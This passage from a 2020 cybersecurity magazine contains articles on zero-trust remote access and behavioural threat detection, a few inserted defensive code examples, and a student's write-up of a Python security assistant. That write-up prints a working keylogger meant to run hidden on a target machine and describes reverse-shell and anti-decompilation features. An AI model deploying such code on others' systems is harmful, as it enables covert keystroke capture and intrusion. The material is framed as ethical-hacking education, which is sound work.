1. What do we need to do? Prioritize the most important tasks. Then, consider the resources users will need and what can be postponed or cut altogether.

2. Who needs access, when? Consider the access policies needed to align access with mission priorities. Do all employees need to have always-on connectivity? What work requires only occasional connectivity? To ensure comprehensive, secure access, agencies may initially need to take a “tiered” connectivity approach.

3. How can employees connect? Some employees may have had government-issued laptops and devices prior to the crisis, but do all employees now need laptops? Prioritize needs. Then, evaluate risks and develop BYOD policies and education.

4. Can we stagger work hours? It may not be possible to accommodate an almost entirely remote workforce within the typical 9-5 hours. Some agencies can adjust work hours, moving mission critical work to the “graveyard-shift” hours to ensure seamless connectivity to perform critical duties.

5. How do we improve performance/connection speed? As the network perimeter expands, many agencies are moving to the cloud through a secure access service edge (SASE) model. Direct access via internet breakouts provides fast, secure access for all users.

What’s Next? Evaluating and Evolving Telework Health for the Long Haul

Once mission critical teams are operational in remote environments and the organization has moved past that initial crisis response, the next step is to take the lessons learned and evaluate how to continue down the modernization path. What will drive simplicity, reduce costs, and create scalability for any future COOP scenarios?

This is not a one-and-done process but should be built into ongoing IT operations and planning.

Here are six design architecture questions to help frame telework health – with the goal of driving digital transformation and improving security, access, and support for remote employees:

1. Do we provide a seamless user experience with direct access to internal and external applications?

Agencies need to adjust security from traditional, legacy appliance-based tools, such as VPNs, to a solution that secures traffic no matter where the user or target application resides. Zero trust connections allow users to directly access applications in any location. This eliminates the hair-pinning caused by backhauling traffic through a VPN, reduces traffic, and reduces latency – ultimately, improving the user experience. Zero trust also never puts users on the network, reducing the attack surface.

2. Do we have context-aware access?

Users should only be given access to resources and applications necessary for their job functions. Agencies should develop clear access policies and rules enforced through a zero trust security model, where only authorized users will be granted access to authorized applications. This can further limit east-west traffic on the network so that users will not reach applications they were not intended to reach.

Context-aware access also delivers benefits beyond work-from-home security, such as mergers and acquisitions, cloud migration, third-party access, and more. Zero trust network access solutions address all of these scenarios with simple policies that are user-centric, rather than network-centric.

3. Are we enabling flexible deployment for instant and seamless expansion?

A cloud-based zero trust service can provide a scalable environment without placing a significant burden on the IT team. Agencies can start with an initial use case and transition from broad policies to more granular and specific policies as they go. And many Federal agencies already have elements of zero trust in their infrastructure, such as endpoint management, Continuous Diagnostics and Mitigation, software-defined networking, micro-segmentation, and cloud monitoring. Once zero trust access is fully operational, decommission VPN access for the group, then iterate as necessary.

4. How are we providing comprehensive visibility and troubleshooting that enables rapid user-issue resolution?

In a legacy environment, you can’t protect what you don’t know is there. A disadvantage of legacy solutions is that data is often distributed across the environment, and agencies often use complex tools with multiple interfaces, methodologies, and terminologies. This creates a higher likelihood that bad actors could be hiding in the background, hoping to be overlooked. Zero trust provides IT administrators with a single pane of glass view to manage, administer, and log users in one place. Administrators will have full visibility and control over the distributed environment.

5. How do we reduce security and remote access infrastructure maintenance requirements?

Appliance-based remote access solutions constantly need updates to firmware, software, security, and policies to keep up to date with technology and advancing security risks. A cloud Software-as-a-Service model greatly reduces management and upkeep. This can free up time for agencies to focus on more critical mission needs along with improving their policies, instead of patching security holes.

6. What will ensure scalability for future COOP scenarios?

Legacy remote access solutions, such as VPNs, may require adjustments to bandwidth, throughput, or additional technology adoption to scale to meet operational needs. Many agencies’ initial reactions to the current crisis have been to grow capacity by implementing new infrastructure or adding new appliances. But a cloud-native capability is the only solution that can easily scale up and down as needed when future COOP scenarios arise.

Cloud-delivered zero trust SASE models will transition security from network-centric controls and remote network connectivity to user-centric and application-centric security, designed to support highly distributed teams working beyond the traditional network perimeter.
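The access rule that both this article (question 2, context-aware access) and the Pulse Secure piece earlier in this issue describe, as an added example that is neither Zscaler's nor Pulse Secure's product logic. Each request is decided on three checks in order: the user is authenticated (here, MFA satisfied), the device passes a posture check, and the user is entitled to that specific application. Nothing is decided at the network level, and the decision is re-run for every request, so a session whose device drifts out of compliance is cut off at the next check rather than living on because it was once allowed. The users, entitlements, posture policy and minimum OS version are constructed.

```python
"""Zero trust per-request access decision with continuous re-evaluation (added example)."""
from dataclasses import dataclass

# Constructed entitlements: which applications each user may reach.
ENTITLEMENTS = {
    "alice": {"hr-portal", "wiki"},
    "bob": {"wiki"},
}

# Constructed posture policy: minimum OS version a device must run.
MIN_OS_VERSION = (10, 15)


@dataclass
class DevicePosture:
    os_version: tuple      # e.g. (11, 2); corporate, personal or public device
    disk_encrypted: bool
    edr_running: bool


@dataclass
class Request:
    user: str
    mfa_verified: bool
    device: DevicePosture
    app: str


def posture_failures(d):
    """Return the list of failed posture checks; empty means compliant."""
    failures = []
    if d.os_version < MIN_OS_VERSION:
        failures.append("os-outdated")
    if not d.disk_encrypted:
        failures.append("disk-unencrypted")
    if not d.edr_running:
        failures.append("edr-missing")
    return failures


def decide(req):
    """Return (allowed, reason). Order: identity, then device, then entitlement."""
    if not req.mfa_verified:
        return False, "authentication: MFA not satisfied"
    failures = posture_failures(req.device)
    if failures:
        return False, "device posture: " + ", ".join(failures)
    if req.app not in ENTITLEMENTS.get(req.user, set()):
        return False, f"authorization: {req.user} not entitled to {req.app}"
    return True, "allow"


def replay_session(user, app, posture_timeline, mfa_verified=True):
    """Re-evaluate one app session against a stream of posture snapshots.

    Returns the index of the first snapshot at which access is denied, or
    None if the session stays compliant throughout. Earlier approvals carry
    no weight: that is the "continuous verification" the articles describe.
    """
    for i, posture in enumerate(posture_timeline):
        allowed, _ = decide(Request(user, mfa_verified, posture, app))
        if not allowed:
            return i
    return None


if __name__ == "__main__":
    good = DevicePosture((11, 2), True, True)
    stale = DevicePosture((10, 14), True, False)
    print(decide(Request("alice", True, good, "hr-portal")))
    print(decide(Request("bob", True, good, "hr-portal")))
    print("session cut at snapshot", replay_session("alice", "wiki", [good, good, stale]))
```

Because the entitlement check is per application rather than per network segment, bob's denial for `hr-portal` holds even though he is a valid, MFA-verified user on a compliant device; that is what limits the east-west reach the article describes.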
One thing we’ve learned from these past months is that every agency needs a systematic process to evaluate telework health. These questions and review processes will create a stronger, more resilient government that can keep employees safe, productive, and focused on delivering citizen services.

About the Author

Stan Lowe, Global Chief Information Security Officer.

Stan Lowe, a cybersecurity and technology executive, has successfully led transformational change in large, complex environments, as well as small and mid-size cybersecurity and IT organizations.

As Zscaler Global Chief Information Security Officer, Stan oversees the security of the Zscaler enterprise and works with the product and operations groups to ensure that Zscaler products and services are secure. Part of his focus is to work with customers to help them fully utilize Zscaler services and realize the maximum return on their investment.

Prior to joining Zscaler, Stan served as the VP & Global Chief Information Security Officer for PerkinElmer, where he was responsible for global enterprise security and privacy. He has also been a Cyber Security Principal at Booz Allen Hamilton.

Stan has extensive federal experience, serving as the U.S. Department of Veterans Affairs (VA) Deputy Assistant Secretary for Information Security, Chief Information Security Officer, and Deputy Chief Privacy Officer, as well as Deputy Director of the Department of Defense/VA Interagency Program Office. Before joining the VA, Stan served as Chief Information Officer of the Federal Trade Commission. Stan’s public service record extends to the U.S. Department of Interior in the Bureau, the U.S. Postal Service Inspector General, and the U.S. Navy.

Stan has also served as an executive in several technology startups, and currently serves on several boards advising on cybersecurity. He is a frequent speaker and writer on security topics.
CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route These “Below The Radar” Attacks

New Ransomware/Exfiltration Campaign Targeting Remote Access Resists Resolution Through Data Restoration

By Saryu Nayyar, CEO, Gurucul

Remote access tools, such as VPNs, RDP, VNC, Citrix, and others, have always been an inviting target for attackers. Even 2003’s Matrix Reloaded used an exploit against an old version of Secure Shell (SSH) as a plot device, in a rare cinematic example of a real-world cyber-security threat. The recent shift to a remote workforce in response to a global pandemic has made remote access an even more inviting target for threat actors of all stripes.

As a recent report from New Zealand’s CERT pointed out, malicious actors are actively focusing on remote access vectors, using a range of attack techniques. While unpatched systems are an ongoing issue, attackers are also targeting weak authentication schemes, including a notable lack of two-factor authentication. The users themselves are also a primary target. Targeted email such as spear phishing, which goes after a specific individual, or cast-netting, which targets people within a single organization, has a history of success and has seen a noticeable rise.

Fortunately, information security professionals still have a range of tools and techniques they can use to help prevent breaches and to mitigate them when they do happen.

Many attack scenarios, especially ones involving remote access attacks, start with targeting the users themselves. Many penetration testers will tell you the users are the easiest target and the first thing they’ll go after. But this also gives an organization the opportunity to convert its user base from part of the attack surface into its first line of defense. Making sure you have trained them on best practices and have enabled a strong multi-factor authentication scheme can go a long way toward preventing unauthorized access.

For many organizations, the Security Operations team, rather than their users, is the main line of defense. Even when the services are provided in whole or in part by a third party, they are the ones who have the ultimate responsibility for the organization’s security well-being, which means assuring they have the correct tools and the right training is as important as making sure the users are trained and equipped. The question becomes whether they have the right tools and training to identify and mitigate attack profiles that have now shifted to target the remote workforce.

The threats they have historically focused on have not disappeared, but they may no longer be the primary attack surface. Likewise, the tools they use to identify and mitigate attacks may not be the best ones now that the attacker’s focus has shifted.

Threat actors have become increasingly skilled at compromising systems and then hiding their activity “below the radar”, where no single indicator stands out. More so now that they have a remote workforce to both target for attack and use for concealment. That means the SecOps team will need to look at the situation holistically rather than relying on single indicators of compromise.

To that end, an advanced security analytics platform that can consolidate all the organization’s security data into a single place and then perform AI-based analytics on the entirety of the data may be in order. By looking at all the information, it is possible to identify anomalous behavior that differs subtly from what’s expected, or accepted, for a normal user. That can be the first indication of a compromise. Using machine learning techniques, the system can adapt to the changing threat surface and present a risk-based assessment to the SecOps team.
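The baseline-and-deviation idea behind the previous two paragraphs, as an added example that is not Gurucul's product or any vendor's algorithm. It builds a per-user baseline (usual login hours, source countries and devices) from a history window of VPN logins, then scores new events by how many attributes fall outside that baseline. One unusual attribute on its own scores low, which is the "single indicator" problem the article describes; several at once score high enough to surface to the SecOps team. The log lines, users, countries, device names and score weights are all constructed.

```python
"""Per-user behavioural baseline and risk scoring of remote-access logins (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed VPN login log. Format: timestamp user country device result
HISTORY = """\
2020-06-01T08:12:00 alice US laptop-a1 success
2020-06-02T08:40:00 alice US laptop-a1 success
2020-06-03T09:05:00 alice US laptop-a1 success
2020-06-04T08:55:00 alice US laptop-a1 success
2020-06-01T22:10:00 bob IN laptop-b7 success
2020-06-02T21:45:00 bob IN laptop-b7 success
2020-06-03T22:30:00 bob IN laptop-b7 success
""".splitlines()

# Constructed events to score against that history.
NEW_EVENTS = """\
2020-06-08T08:30:00 alice US laptop-a1 success
2020-06-08T03:17:00 alice RO win-unknown success
2020-06-08T22:05:00 bob IN laptop-b7 success
2020-06-08T22:20:00 bob IN laptop-b7 failure
""".splitlines()


def parse(line):
    """Parse one log line into a dict; the format is this example's own."""
    ts, user, country, device, result = line.split()
    return {"time": datetime.fromisoformat(ts), "user": user,
            "country": country, "device": device, "result": result}


def build_baseline(lines):
    """Per user: the hours, countries and devices seen in the history window."""
    baseline = defaultdict(lambda: {"hours": set(), "countries": set(),
                                    "devices": set()})
    for ev in map(parse, lines):
        b = baseline[ev["user"]]
        b["hours"].add(ev["time"].hour)
        b["countries"].add(ev["country"])
        b["devices"].add(ev["device"])
    return baseline


def score_event(ev, baseline):
    """Additive risk score plus reasons. Weights are constructed, not calibrated."""
    b = baseline.get(ev["user"])
    if b is None:
        return 50, ["no baseline for user"]
    score, reasons = 0, []
    # Tolerate one hour of drift either side of any previously seen hour.
    if not any(abs(ev["time"].hour - h) <= 1 for h in b["hours"]):
        score += 20
        reasons.append("login outside usual hours")
    if ev["country"] not in b["countries"]:
        score += 30
        reasons.append("new source country")
    if ev["device"] not in b["devices"]:
        score += 30
        reasons.append("new device")
    if ev["result"] != "success":
        score += 10
        reasons.append("failed authentication")
    return score, reasons


def score_events(lines, baseline):
    """Return [(user, score, reasons), ...] in input order."""
    return [(ev["user"], *score_event(ev, baseline)) for ev in map(parse, lines)]


if __name__ == "__main__":
    baseline = build_baseline(HISTORY)
    for user, score, reasons in score_events(NEW_EVENTS, baseline):
        flag = "REVIEW" if score >= 50 else "ok"
        print(f"{user:6} {score:3} {flag:6} {', '.join(reasons)}")
```

The second alice event is the case the article has in mind: each attribute alone (an odd hour, a new country, a new device) is the sort of thing a tired analyst waves through, but the combination across the consolidated data pushes the score over the review threshold. A real platform learns the weights and the tolerances from data rather than fixing them by hand, but the shape of the logic is the same.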
Combined with their existing tools and efficient automation, security operations personnel can get ahead of an attack to keep a single compromised account or remote access system from escalating into a serious data breach.

About the Author

Saryu Nayyar is the CEO of Gurucul. She is an internationally recognized cybersecurity expert, author and speaker with more than 15 years of experience in the information security, identity and access management, IT risk and compliance, and security risk management sectors. She was named EY Entrepreneurial Winning Women in 2017. She has held leadership roles in security products and services strategy at Oracle, Simeio, Sun Microsystems, Vaau (acquired by Sun) and Disney, and held senior positions in the technology security and risk management practice of Ernst & Young. She is passionate about building disruptive technologies and has several patents pending for behavior analytics, anomaly detection and dynamic risk scoring inventions.

Saryu can be reached on Twitter at @Gurucul.
CRYPTO<br />
An Amalgamation of <strong>Cyber</strong> <strong>Defense</strong> and Ethical Hacking Mechanisms<br />
By Staford Titus S<br />
Prelude<br />
Security on its own is a misnomer in this technological and (for the most part) cybernated era. <strong>Cyber</strong>-<br />
Security has emerged as a crucial factor in protecting almost every, or atleast the online aspect of human<br />
lives. The preponderance of electronic devices used are computers, including mobile phones, Smart TVs<br />
and even smart watches, all of which contain personal or business data. <strong>Cyber</strong>crimes take place<br />
ubiquitously, wrecking havoc by causing loss and sometimes even misuse of these information.<br />
According to RiskIQ’s 2019 Evil Internet Minute, cybercrimes cost around $2.9 million dollars to the global<br />
economy every minute. This invokes the necessity to secure data, to prevent it from being stolen or<br />
compromised. It is thus, unerring to assume that cybercrimes are imminent, and hence, preventive<br />
countermeasures are required to be set in place to sail above these turbulent waves of cyber-attacks.<br />
Centralizing this theme, initialised the development of Crypto. The idea involves developing an AI<br />
assistant that is capable of implementing secure policies using built-in security tools and also aid in ethical<br />
hacking operations. For those of you, for whom, on reading the word AI, nightmares of AI world<br />
domination are imminent:<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 130<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Fig 1: AI Meme<br />
This article documents the several security and hacking methodologies infrastructured in Crypto. A good<br />
number of security policies and frameworks have been implemented to help secure the systems.<br />
The Root<br />
The developmental strategies involved are loosely adhered to and inspired by the control<br />
strategies/countermeasures discussed by one, Charles P. Pfleeger in the book “Security in Computing”.<br />
According to Fig 2 we can deal with cyber attacks in the following ways:<br />
1. prevent it, by blocking the attack or closing the vulnerability<br />
2. deter it, by making the attack harder but not impossible<br />
3. deflect it, by making another target more attractive (or this one less so)<br />
4. mitigate it, by making its impact less severe<br />
5. detect it, either as it happens or some time after the fact<br />
6. recover from its effects<br />
“Prevention is better than cure!” That statement captures what the tool aims to accomplish, since it is<br />
always better to prevent an attack than to rebuild from its wreckage. The aforementioned strategies<br />
are implemented in several different ways; one example is the Intrusion Detection System, which<br />
helps detect anomalies and intrusions and redirects them to honeypots or isolated networks, thereby<br />
combining several of the control strategies in one mechanism.<br />
Fig 2: Control Strategies from the book “Security in Computing”<br />
Under the Hood and UI<br />
Built with the primary intention of implementing security mechanisms and countermeasures along with hacker-aiding<br />
tools, Crypto’s underlying architecture is powered by good old Python. Python was chosen over<br />
other programming languages because of the sheer size of the open-source libraries and packages it<br />
offers. Eel was introduced into the infrastructure to establish a reliable connection between the frontend<br />
and backend functions/mechanisms. Eel is a little Python library for making simple Electron-like offline<br />
HTML/JS GUI apps. Eel offered far more than it promised, which made it possible to incorporate several features<br />
that previously couldn’t be combined. Exposing a Python function to the frontend is as simple as adding an<br />
“@eel.expose” line above it. Considering the versatility and user-friendliness of this approach, as well as<br />
the design possibilities that HTML and CSS open up, the offering is not a CLI tool<br />
but has a natty-looking GUI. Centre-bottom is the user input, top-middle is the chat box, bottom-left is<br />
the news tab, bottom-right is the console, which displays all of the console logs and messages, and top-<br />
right shows the date & time and weather data. Top-left is reserved for popup menus. The next few sections<br />
elucidate the several security and hacking mechanisms implemented in the project module.<br />
Fig 3: Screengrab of Crypto’s UI<br />
Security Mechanisms<br />
Honeypot<br />
Luring an unsuspecting attacker into a trap is the single mechanism that a honeypot implements.<br />
According to Wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some<br />
manner, counteract attempts at unauthorized use of information systems. Creating a honeypot on any<br />
port presents it as a decoy that is enticing to attackers, thus preventing, or at least slowing down,<br />
attacks on the main system. Logging of any activity performed in the honeypot environment by<br />
attackers who mistake it for a real loophole is also implemented to strengthen the security policy.<br />
The logs can be sent to the user’s mail or even stored on remote servers such as Graylog for future<br />
pattern analysis. Below is a code sample of the honeypot:<br />
```python
import atexit
import socket

import eel


def exit_handler():
    # Called at interpreter exit. Stand-in for the project's own exit_handler,
    # which the excerpt does not show.
    print('[*] Honeypot shutting down')


def sendLog(source, data):
    # Record who connected and what they sent. The project forwards these
    # records by e-mail or to a Graylog server; this stand-in appends them to
    # a local file so the excerpt runs on its own.
    if isinstance(data, bytes):
        data = data.decode('utf-8', errors='replace')
    with open('honeypot.log', 'a') as f:
        f.write('%s %r\n' % (source, data))


@eel.expose
def honeypot():
    LHOST = '0.0.0.0'
    LPORT = 1024
    RHOST = '192.168.29.203'  # not used in this excerpt
    RPORT = 9000              # not used in this excerpt
    # Fake service banner so the port looks like an old ProFTPD daemon.
    BANNER = '220 ProFTPD 1.2.8 Server\nName: '
    TIMEOUT = 10
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def hon():
        # eel.test(...) mirrors the message to the GUI console through Eel.
        print('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))
        eel.test('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))
        atexit.register(exit_handler)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((LHOST, LPORT))
        listener.listen(5)
        while True:
            (insock, address) = listener.accept()
            insock.settimeout(TIMEOUT)
            msg = ('[*] Honeypot connection from ' + address[0] + ':'
                   + str(address[1]) + ' on port ' + str(LPORT))
            print(msg)
            eel.test(msg)
            try:
                # Send the decoy banner, then capture whatever the client sends.
                insock.send(BANNER.encode())
                data = insock.recv(1024)
            except socket.error as e:
                sendLog(address[0], 'Error: ' + str(e))
            else:
                sendLog(address[0], data)
            finally:
                insock.close()

    hon()
```
Fig 4: Screengrab of Honeypot in Action<br />
Intrusion Detection System<br />
Intrusion detection is a particularly important mechanism to implement, since detecting an anomaly<br />
or intrusion is the fundamental step in protecting a system. It is based on strategies of<br />
round-the-clock detection and scanning. The IDS is created as a virtual network using Mininet, whose hosts<br />
serve as honeypots that continually monitor the traffic flowing in and out of the network for anomalies.<br />
If an anomaly or outlier is detected, an email about it is sent to the user, and fake SYN packets<br />
are sent so that the attackers connect to a virtualized and isolated Mininet network. This mechanism is still<br />
under rudimentary development and testing owing to the length and breadth of operations and functions<br />
it aims to deliver.<br />
Parser Differential<br />
This mechanism is implemented in order to cripple the various ELF executable decompilers out there.<br />
The given C program is run through an algorithm that makes the resulting binary unreadable to decompilers<br />
such as radare2 or even gdb. This mechanism is highly influenced by LiveOverflow’s Reversing series.<br />
Cracking programs to find license keys thus gets much harder. The parser differential module allows<br />
the user to upload C programs that they want to scramble in order to prevent cracking. The underlying<br />
algorithm is quite simple but extremely effective. Only one random byte within the binary is scrambled, which<br />
renders the whole file unreadable to decompilers while Linux still runs it. Hence the code<br />
can be executed but not decompiled.<br />
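The defender’s side of that differential is a consistency check: Linux loads an ELF executable from its program headers and does not consult the section header table, so a header whose section-table fields disagree with the file itself is a sign of exactly this kind of anti-analysis tampering. The check below is an added example written for this article, not code from Crypto; `check_elf_header`, `build_sample_elf` and `tamper_one_byte` are names chosen here, and the ELF64 skeleton it runs on is constructed inline and is not an executable program.

```python
import struct

# ELF64 header fields after the 16-byte e_ident, little-endian:
# e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
# e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
EHDR_FMT = '<HHIQQQIHHHHHH'
EHDR_SIZE = 64   # sizeof(Elf64_Ehdr)
PHDR_SIZE = 56   # sizeof(Elf64_Phdr)
SHDR_SIZE = 64   # sizeof(Elf64_Shdr)
FIELDS = ('e_type', 'e_machine', 'e_version', 'e_entry', 'e_phoff',
          'e_shoff', 'e_flags', 'e_ehsize', 'e_phentsize', 'e_phnum',
          'e_shentsize', 'e_shnum', 'e_shstrndx')


def parse_elf64_header(data):
    """Return the ELF64 header as a dict; only little-endian ELF64 is handled."""
    if len(data) < EHDR_SIZE or data[:4] != b'\x7fELF':
        raise ValueError('not an ELF file')
    if data[4] != 2 or data[5] != 1:
        raise ValueError('only little-endian ELF64 is handled here')
    return dict(zip(FIELDS, struct.unpack_from(EHDR_FMT, data, 16)))


def check_elf_header(data):
    """List header fields that are inconsistent with the file itself.

    The kernel needs only the program headers to run a binary, so damage to
    the section-header fields is what a decompiler stumbles over while the
    program still executes. An empty list means no anomaly was found.
    """
    h = parse_elf64_header(data)
    size = len(data)
    findings = []
    if h['e_ehsize'] != EHDR_SIZE:
        findings.append('e_ehsize is %d, expected %d' % (h['e_ehsize'], EHDR_SIZE))
    if h['e_phnum']:
        if h['e_phentsize'] != PHDR_SIZE:
            findings.append('e_phentsize is %d, expected %d'
                            % (h['e_phentsize'], PHDR_SIZE))
        if h['e_phoff'] + h['e_phnum'] * h['e_phentsize'] > size:
            findings.append('program header table runs past end of file')
    if h['e_shnum']:
        if h['e_shentsize'] != SHDR_SIZE:
            findings.append('e_shentsize is %d, expected %d'
                            % (h['e_shentsize'], SHDR_SIZE))
        if h['e_shoff'] + h['e_shnum'] * h['e_shentsize'] > size:
            findings.append('section header table runs past end of file '
                            '(e_shoff=0x%x)' % h['e_shoff'])
        if h['e_shstrndx'] >= h['e_shnum']:
            findings.append('e_shstrndx %d is outside the %d section headers'
                            % (h['e_shstrndx'], h['e_shnum']))
    return findings


def build_sample_elf():
    """Constructed, self-consistent ELF64 skeleton used as sample input.

    Header, one zeroed program header and three zeroed section headers:
    a parser test vector, not a runnable program.
    """
    phoff = EHDR_SIZE
    shoff = phoff + PHDR_SIZE
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, LSB, v1
    ehdr = ident + struct.pack(EHDR_FMT, 2, 0x3e, 1, 0x401000, phoff, shoff,
                               0, EHDR_SIZE, PHDR_SIZE, 1, SHDR_SIZE, 3, 2)
    return ehdr + bytes(PHDR_SIZE) + bytes(3 * SHDR_SIZE)


def tamper_one_byte(data, offset, value):
    """Copy of data with exactly one byte changed."""
    out = bytearray(data)
    out[offset] = value
    return bytes(out)


if __name__ == '__main__':
    # Simulate a one-byte scramble, placed here in e_shoff (file offset 0x2e)
    # for illustration, and report what the check sees.
    blob = tamper_one_byte(build_sample_elf(), 0x2e, 0xff)
    for finding in check_elf_header(blob) or ['header is self-consistent']:
        print(finding)
```

Running the same check over a directory of binaries and alerting on any non-empty result gives a cheap triage signal for executables that were deliberately made hard to analyse.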
Facial Recognition<br />
Facial recognition is a biometric, artificial-intelligence-based algorithm that can uniquely identify a person<br />
by analyzing patterns based on the person's facial textures and shape. Facial recognition has been<br />
implemented using the JavaScript face recognition library with Haar cascades. This<br />
implementation enhances security by preventing misuse of the features by strangers or unknown<br />
individuals.<br />
Hacking Mechanisms<br />
Port Scanning<br />
Reconnaissance is the first step of any hacking activity, since it is highly important to analyze the intended<br />
target on an intricate, or at the very least a basic, level. Port scanning is one such pre-enumeration method<br />
used to identify open ports and services available on a network host. It could also be considered a security mechanism,<br />
since, in terms of the countermeasures defined above, it is a method of detection/prevention. It can be performed to detect<br />
open ports within any network, enabling admins to close or secure unused or time-constrained ports. Hackers, on the other<br />
hand, can use port scanning to identify the open ports through which they can access the network to perform ping attacks or<br />
smurf attacks at the very least. Implementing this mechanism requires the Python nmap module, which supports various types<br />
of scans. Fig 5 depicts the port scanning process.<br />
Fig 5: Port Scanning demonstration<br />
Reverse Shell<br />
Gaining access to target systems can be a pain; hence, reverse shells have been integrated to provide<br />
substantial aid in enumeration and forensic analysis. For this, a client-side package is provided which,<br />
when run on the target machine, activates the reverse shell, establishing a connection by<br />
binding sockets over ports. Once the reverse shell is active, users can type in Unix commands to access<br />
data and the like on the target machine. It also enables users to download or upload files over FTP<br />
connections.<br />
Keylogger<br />
The keylogger is another great tool, which can be used to log keystrokes. Users are provided with a client<br />
package which runs in the background on the target machine and records keystrokes<br />
with high precision, and can also send the keylogger data to the user’s email. An example code snippet of the<br />
keylogger is as below:<br />
```python
from pynput.keyboard import Listener


def logger(key):
    # str(key) gives "'a'" for printable keys and "Key.space" etc. for
    # special keys; strip the quotes so only the character remains.
    letter = str(key)
    letter = letter.replace("'", "")
    if letter == 'Key.space':
        letter = ' '
    if letter == 'Key.shift_r':
        letter = ''
    if letter == "Key.ctrl_l":
        letter = ""
    if letter == "Key.enter":
        letter = "\n"
    # Append each keystroke to the log file.
    with open("log.txt", 'a') as f:
        f.write(letter)


# Block on the keyboard listener, calling logger() for every key press.
with Listener(on_press=logger) as l:
    l.join()
```
Encode/Decode<br />
Any and every pentester or hacker has, without doubt, faced encoded data in their various<br />
hacking endeavours. Hence several of the most popular encoding/decoding schemes, such as Base64,<br />
URL, Brainfuck, JS obfuscation, etc., have been implemented. Encryption using AES (Advanced<br />
Encryption Standard) is also provided, as depicted in Fig 6.<br />
Fig 6: AES Encryption<br />
Auxiliary Features/Mechanisms<br />
The several auxiliary mechanisms intertwined are:<br />
● Captcha Breaker<br />
● Strong Password Generator<br />
● File Scanning<br />
● Email Sender<br />
● Time and Weather<br />
● News<br />
● AI you can converse with<br />
Conclusion<br />
At present, cyber-crimes have become more dangerous than ever before, embodying menacing<br />
hackers from all around the globe. It is therefore high time that cyber security is given the<br />
front seat, enabling us to fight back. The above documented approach to implementing the security<br />
policies is but a small step in aiding ethical hackers. Hopefully, this article succeeded in portraying “a<br />
method” to embrace the countermeasures and security mechanisms.<br />
References<br />
Charles P. Pfleeger, “Security in Computing”.<br />
LiveOverflow, on YouTube or at www.liveoverflow.com<br />
Mininet: Rapid Prototyping for Software Networks<br />
Xavier A. Larriva-Novo, Mario Vega-Barbas, “Evaluation of Cybersecurity Data Set Characteristics for Their<br />
Applicability to Neural Networks Algorithms Detecting Cybersecurity Anomalies”, 01 January 2020<br />
About the Author<br />
I am a budding Ethical Hacker with a towering interest in the security<br />
field. I am currently pursuing my Bachelors in Computer Science<br />
and Engineering at Jaya Engineering College in Chennai, India. I<br />
have participated in several CTF competitions and completed<br />
several courses on pentesting. My interest in cyber-security was<br />
piqued by the length and breadth of its applications and the thrill<br />
involved in solving the challenges. Hence, to no one’s surprise, I am<br />
currently working on several vulnhub boxes and overthewire<br />
challenges. Anybody wanting to collaborate can connect on twitter<br />
(@stafordtitus) or LinkedIn (https://www.linkedin.com/in/stafordtitus-643638147/).<br />
Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS<br />
“Amazing Keynote”<br />
“Best Speaker on the Hacking Stage”<br />
“Most Entertaining and Engaging”<br />
Gary has been keynoting cyber security events throughout the year. He’s also been a<br />
moderator, a panelist and has numerous upcoming events throughout the year.<br />
If you are looking for a cybersecurity expert who can make the difference from a nice event to<br />
a stellar conference, look no further email marketing@cyberdefensemagazine.com<br />
You asked, and it’s finally here…we’ve launched <strong>Cyber</strong><strong>Defense</strong>.TV<br />
At least a dozen exceptional interviews rolling out each month starting this summer…<br />
Market leaders, innovators, CEO hot seat interviews and much more.<br />
A new division of <strong>Cyber</strong> <strong>Defense</strong> Media Group and sister to <strong>Cyber</strong> <strong>Defense</strong> Magazine.<br />
Free Monthly <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> Via Email<br />
Enjoy our monthly electronic editions of our Magazines for FREE.<br />
This magazine is by and for ethical information security professionals with a twist on innovative consumer<br />
products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our<br />
mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best<br />
ideas, products and services in the information technology industry. Our monthly <strong>Cyber</strong> <strong>Defense</strong> e-<br />
Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare<br />
arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of<br />
sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here<br />
to sign up today and within moments, you’ll receive your first email from us with an archive of our<br />
newsletters along with this month’s newsletter.<br />
By signing up, you’ll always be in the loop with CDM.<br />
Copyright (C) <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.<br />
SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a<br />
<strong>Cyber</strong><strong>Defense</strong>Awards.com, <strong>Cyber</strong><strong>Defense</strong>Magazine.com, <strong>Cyber</strong><strong>Defense</strong>Newswire.com,<br />
<strong>Cyber</strong><strong>Defense</strong>Professionals.com, <strong>Cyber</strong><strong>Defense</strong>Radio.com and <strong>Cyber</strong><strong>Defense</strong>TV.com, is a Limited Liability<br />
Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465,<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine® is a registered trademark of <strong>Cyber</strong> <strong>Defense</strong> Media Group. EIN: 454-18-8465, DUNS#<br />
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com<br />
All rights reserved worldwide. Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved. No part of this<br />
newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,<br />
recording, taping or by any information storage retrieval system without the written permission of the publisher<br />
